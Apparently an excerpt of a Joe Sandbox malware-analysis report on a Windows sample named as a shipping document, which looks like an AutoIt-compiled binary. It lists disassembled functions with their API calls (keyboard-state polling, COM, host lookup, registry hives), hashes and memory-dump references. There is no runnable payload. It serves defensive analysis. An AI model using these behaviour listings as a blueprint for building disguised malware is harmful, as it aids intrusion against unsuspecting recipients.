                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                    • String ID: (
                    • API String ID: 2598888154-3887548279
                    • Opcode ID: a940f13eedff274a69ea6d2de2388b535c558208bd4f8d7ca533d7f6aa69aee4
                    • Instruction ID: dc532848b3a13fcb0ac25ebf0433caa218efdeb0e8ae5d4d3e6bda092f91e94e
                    • Opcode Fuzzy Hash: a940f13eedff274a69ea6d2de2388b535c558208bd4f8d7ca533d7f6aa69aee4
                    • Instruction Fuzzy Hash: 92515C71904309EFCB15CFA9DC85EAEBBB9EF48310F14842DF999A7251D731A944CB50
                    Function 00E06BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E20AD7: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00E06C6C,?,00008000), ref: 00E20AF3
                      • Part of subcall function 00E048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E048A1,?,?,00E037C0,?), ref: 00E048CE
                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E06D0D
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E06E5A
                      • Part of subcall function 00E059CD: _wcscpy.LIBCMT ref: 00E05A05
                      • Part of subcall function 00E237BD: _iswctype.LIBCMT ref: 00E237C5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                    • API String ID: 537147316-1018226102
                    • Opcode ID: 96cdefb1d114cbe21afe77b8e96aa980b791c0cc228ac097eafc0a53a3fe7089
                    • Instruction ID: b2e4ff486c45843115fe9a7f94a691a9e36d39ba21a100bda3beefc7fa2264de
                    • Opcode Fuzzy Hash: 96cdefb1d114cbe21afe77b8e96aa980b791c0cc228ac097eafc0a53a3fe7089
                    • Instruction Fuzzy Hash: C0027E715083419FC724EF24C881AAFBBE5AF98354F04691DF495B72A1DB30EA89CB52
                    Function 00E045DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00E045F9
                    • GetMenuItemCount.USER32(00EC5890), ref: 00E3D6FD
                    • GetMenuItemCount.USER32(00EC5890), ref: 00E3D7AD
                    • GetCursorPos.USER32(?), ref: 00E3D7F1
                    • SetForegroundWindow.USER32(00000000), ref: 00E3D7FA
                    • TrackPopupMenuEx.USER32(00EC5890,00000000,?,00000000,00000000,00000000), ref: 00E3D80D
                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E3D819
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                    • String ID:
                    • API String ID: 2751501086-0
                    • Opcode ID: 05553251f661cf921f4d7fdced3221cb253d734c066454670757bf8383a1249c
                    • Instruction ID: 87adf54adfadc32af910058b1fc3aae6bf3f467d794ad0fc87715089316ab907
                    • Opcode Fuzzy Hash: 05553251f661cf921f4d7fdced3221cb253d734c066454670757bf8383a1249c
                    • Instruction Fuzzy Hash: 657127B0644205BFEB219F55EC4AFAABFA4FF05368F101216F629B61E0C7B15C50CB90
                    Function 00E789C0 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                    Download Yara Rule
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 00E789EC
                    • CoInitialize.OLE32(00000000), ref: 00E78A19
                    • CoUninitialize.OLE32 ref: 00E78A23
                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00E78B23
                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00E78C50
                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00E92C0C), ref: 00E78C84
                    • CoGetObject.OLE32(?,00000000,00E92C0C,?), ref: 00E78CA7
                    • SetErrorMode.KERNEL32(00000000), ref: 00E78CBA
                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00E78D3A
                    • VariantClear.OLEAUT32(?), ref: 00E78D4A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                    • String ID: ,,
                    • API String ID: 2395222682-1556401989
                    • Opcode ID: d3401ea0f84ca650eb0809c37a27dd4cd753294e0c6ef24f63d59398ebcad928
                    • Instruction ID: 5b347f8d2962c4dbe69261216d6d5859f9370351b214361c457c5c76aab4fab3
                    • Opcode Fuzzy Hash: d3401ea0f84ca650eb0809c37a27dd4cd753294e0c6ef24f63d59398ebcad928
                    • Instruction Fuzzy Hash: 2BC135B1608305AFC704DF64C98892BB7E9FF98348F00995DF98AAB251DB31ED45CB52
                    Function 00E80EA5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E7FE38,?,?), ref: 00E80EBC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                    • API String ID: 3964851224-909552448
                    • Opcode ID: 8a4b98a6800d0b15fbc5c3d0a99eb0c78bc77d501ee8b4346f740aea052723b5
                    • Instruction ID: 36e4c7dac135604ba573a16c8d828b4794f708477efe652ead5affdc9993e575
                    • Opcode Fuzzy Hash: 8a4b98a6800d0b15fbc5c3d0a99eb0c78bc77d501ee8b4346f740aea052723b5
                    • Instruction Fuzzy Hash: 83417C7020025A8BCF20EF10ECD2AEF3764AF91304F146469FD697B293DB35995ACB60
                    Function 00E5FAD2 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00E3E5F9,00000010,?,Bad directive syntax error,00E8F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00E5FAF3
                    • LoadStringW.USER32(00000000,?,00E3E5F9,00000010), ref: 00E5FAFA
                      • Part of subcall function 00E07F41: _memmove.LIBCMT ref: 00E07F82
                    • _wprintf.LIBCMT ref: 00E5FB2D
                    • __swprintf.LIBCMT ref: 00E5FB4F
                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00E5FBBE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                    • API String ID: 1506413516-4153970271
                    • Opcode ID: 518002edc14ef671e4df471a8d52f26ecc285e435a35b89618d36447f9e45cae
                    • Instruction ID: cdb01b01f1a4910247888acc10c6110d4895d91362395cb1124fa4780612f366
                    • Opcode Fuzzy Hash: 518002edc14ef671e4df471a8d52f26ecc285e435a35b89618d36447f9e45cae
                    • Instruction Fuzzy Hash: 5321937290021EEBCF16AF90CC56EEE7779BF14300F045465F505720A1DA71AA98DB90
                    Function 00E6536E Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E07D2C: _memmove.LIBCMT ref: 00E07D66
                      • Part of subcall function 00E07A84: _memmove.LIBCMT ref: 00E07B0D
                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E653D7
                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E653ED
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E653FE
                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E65410
                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E65421
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: SendString$_memmove
                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                    • API String ID: 2279737902-1007645807
                    • Opcode ID: 6a19f16320afb26a42f25b7b267f5045aae3c95e980ab4dc9135dff9ac2af651
                    • Instruction ID: 1705aaab8ead3b13c7022fec61a56febc1041cbe048dce998abf372a5d0c687f
                    • Opcode Fuzzy Hash: 6a19f16320afb26a42f25b7b267f5045aae3c95e980ab4dc9135dff9ac2af651
                    • Instruction Fuzzy Hash: 7011C431A9022979D720B7A1DC4ADFF7BBCEB95B84F10246AB411B21D1DEA01D85CAB0
                    Function 00E646F8 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                    • String ID: 0.0.0.0
                    • API String ID: 208665112-3771769585
                    • Opcode ID: 0613e8082102ddc5f4c464be343330a6119fd77b53503d47993185b99f3d9d47
                    • Instruction ID: 652fd7cdb7686dd175a4b7b895f0967675402b749a8bafe0a08df224bc200dd6
                    • Opcode Fuzzy Hash: 0613e8082102ddc5f4c464be343330a6119fd77b53503d47993185b99f3d9d47
                    • Instruction Fuzzy Hash: 04110271A44114AFEB24AB20FC4AEEA77EC9B02710F0411B6F409B60D1EF71AAC58B50
                    Function 00E6501C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • timeGetTime.WINMM ref: 00E65021
                      • Part of subcall function 00E2034A: timeGetTime.WINMM(?,75C0B400,00E10FDB), ref: 00E2034E
                    • Sleep.KERNEL32(0000000A), ref: 00E6504D
                    • EnumThreadWindows.USER32(?,Function_00064FCF,00000000), ref: 00E65071
                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00E65093
                    • SetActiveWindow.USER32 ref: 00E650B2
                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E650C0
                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00E650DF
                    • Sleep.KERNEL32(000000FA), ref: 00E650EA
                    • IsWindow.USER32 ref: 00E650F6
                    • EndDialog.USER32(00000000), ref: 00E65107
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                    • String ID: BUTTON
                    • API String ID: 1194449130-3405671355
                    • Opcode ID: b4a163aa3210e6b56507e4d53409b986d66b25ab707df27cfc1d6634b534d85b
                    • Instruction ID: 6e7dab8fd145396b5908334e9243b22e567a2147b2abc0ef8bdfb479487e343b
                    • Opcode Fuzzy Hash: b4a163aa3210e6b56507e4d53409b986d66b25ab707df27cfc1d6634b534d85b
                    • Instruction Fuzzy Hash: 26219272281A04AFE7005F22FC88F263B7AEB453C9F242434F006B11B1DB228C499B61
                    Function 00E6D619 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E09997: __itow.LIBCMT ref: 00E099C2
                      • Part of subcall function 00E09997: __swprintf.LIBCMT ref: 00E09A0C
                    • CoInitialize.OLE32(00000000), ref: 00E6D676
                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00E6D709
                    • SHGetDesktopFolder.SHELL32(?), ref: 00E6D71D
                    • CoCreateInstance.OLE32(00E92D7C,00000000,00000001,00EB8C1C,?), ref: 00E6D769
                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00E6D7D8
                    • CoTaskMemFree.OLE32(?,?), ref: 00E6D830
                    • _memset.LIBCMT ref: 00E6D86D
                    • SHBrowseForFolderW.SHELL32(?), ref: 00E6D8A9
                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00E6D8CC
                    • CoTaskMemFree.OLE32(00000000), ref: 00E6D8D3
                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00E6D90A
                    • CoUninitialize.OLE32(00000001,00000000), ref: 00E6D90C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                    • String ID:
                    • API String ID: 1246142700-0
                    • Opcode ID: b81d62dd2d5fc7af6c9a6d030d6865a69a6fbaa6b291f9d103666f61f6ebbb4e
                    • Instruction ID: 0e3da3ddfb10b865f2a51b180aa658c5e33601d17c3556bb94e02024d4f8b8b9
                    • Opcode Fuzzy Hash: b81d62dd2d5fc7af6c9a6d030d6865a69a6fbaa6b291f9d103666f61f6ebbb4e
                    • Instruction Fuzzy Hash: 18B1EA75A00109AFDB04DFA5DC88DAEBBF9FF88314B149469E909EB261DB30ED45CB50
                    Function 00E6034D Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?), ref: 00E603C8
                    • SetKeyboardState.USER32(?), ref: 00E60433
                    • GetAsyncKeyState.USER32(000000A0), ref: 00E60453
                    • GetKeyState.USER32(000000A0), ref: 00E6046A
                    • GetAsyncKeyState.USER32(000000A1), ref: 00E60499
                    • GetKeyState.USER32(000000A1), ref: 00E604AA
                    • GetAsyncKeyState.USER32(00000011), ref: 00E604D6
                    • GetKeyState.USER32(00000011), ref: 00E604E4
                    • GetAsyncKeyState.USER32(00000012), ref: 00E6050D
                    • GetKeyState.USER32(00000012), ref: 00E6051B
                    • GetAsyncKeyState.USER32(0000005B), ref: 00E60544
                    • GetKeyState.USER32(0000005B), ref: 00E60552
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    • Opcode ID: d138cec870dbe46dc636e0c19d6460869130fdca8f7cc8ab3c8727308e20b837
                    • Instruction ID: bcf1a60be4a92c121e24e5b1269fdeb680a91ad37e34469f48180bb7822d3c7a
                    • Opcode Fuzzy Hash: d138cec870dbe46dc636e0c19d6460869130fdca8f7cc8ab3c8727308e20b837
                    • Instruction Fuzzy Hash: 8551C720A887A42AFB35DBA094107AFBFF49F013C4F489599D5C2761C3DA649F4CCB61
                    Function 00E5C529 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,00000001), ref: 00E5C545
                    • GetWindowRect.USER32(00000000,?), ref: 00E5C557
                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00E5C5B5
                    • GetDlgItem.USER32(?,00000002), ref: 00E5C5C0
                    • GetWindowRect.USER32(00000000,?), ref: 00E5C5D2
                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00E5C626
                    • GetDlgItem.USER32(?,000003E9), ref: 00E5C634
                    • GetWindowRect.USER32(00000000,?), ref: 00E5C645
                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00E5C688
                    • GetDlgItem.USER32(?,000003EA), ref: 00E5C696
                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E5C6B3
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00E5C6C0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$ItemMoveRect$Invalidate
                    • String ID:
                    • API String ID: 3096461208-0
                    • Opcode ID: 54914cc4a1e988d0085964c3352a25220ee27b3eb3f874c1cfd4fe41544e56aa
                    • Instruction ID: 566fc56ac5691da7f8b701d152660bdca14baffa442118e468bb18808f3593f3
                    • Opcode Fuzzy Hash: 54914cc4a1e988d0085964c3352a25220ee27b3eb3f874c1cfd4fe41544e56aa
                    • Instruction Fuzzy Hash: 9D51A370B00305AFDB08CFA9DD95AAEBBB5EF88711F24852DF919E7290D7B09D048B50
                    Function 00E0201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E01B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E02036,?,00000000,?,?,?,?,00E016CB,00000000,?), ref: 00E01B9A
                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00E020D3
                    • KillTimer.USER32(-00000001,?,?,?,?,00E016CB,00000000,?,?,00E01AE2,?,?), ref: 00E0216E
                    • DestroyAcceleratorTable.USER32(00000000), ref: 00E3BE26
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E016CB,00000000,?,?,00E01AE2,?,?), ref: 00E3BE57
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E016CB,00000000,?,?,00E01AE2,?,?), ref: 00E3BE6E
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E016CB,00000000,?,?,00E01AE2,?,?), ref: 00E3BE8A
                    • DeleteObject.GDI32(00000000), ref: 00E3BE9C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                    • String ID:
                    • API String ID: 641708696-0
                    • Opcode ID: e99f04497dc49b29196d218b8f1b8fe23a0a6b39a18cf6cf740c42a8ae732c46
                    • Instruction ID: 5e92796b4288515179b6546f83cff1fcbc5ad524c66ede486178ea406aa33a47
                    • Opcode Fuzzy Hash: e99f04497dc49b29196d218b8f1b8fe23a0a6b39a18cf6cf740c42a8ae732c46
                    • Instruction Fuzzy Hash: 7A617C32101B00DFDB299F1AD94CB6A7BF1FB40315F50A42DE646BA9A0C772A8D5DB80
                    Function 00E021A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E025DB: GetWindowLongW.USER32(?,000000EB), ref: 00E025EC
                    • GetSysColor.USER32(0000000F), ref: 00E021D3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ColorLongWindow
                    • String ID:
                    • API String ID: 259745315-0
                    • Opcode ID: 034ebad2b6432d5aaf2f64f97a20b92c978b5739e8ee00893352a53f34dadd2d
                    • Instruction ID: 45a9c1f602b709130d533499711335fb7e8b7df16df1589d3ae057d241cfab07
                    • Opcode Fuzzy Hash: 034ebad2b6432d5aaf2f64f97a20b92c978b5739e8ee00893352a53f34dadd2d
                    • Instruction Fuzzy Hash: DC41BF31100140EEDB255FA8EC4CBB93BA1EB16325F245269FE65AA1F2C7318CC6DB21
                    Function 00E6A931 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                    Download Yara Rule
                    APIs
                    • CharLowerBuffW.USER32(?,?,00E8F910), ref: 00E6A995
                    • GetDriveTypeW.KERNEL32(00000061,00EB89A0,00000061), ref: 00E6AA5F
                    • _wcscpy.LIBCMT ref: 00E6AA89
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
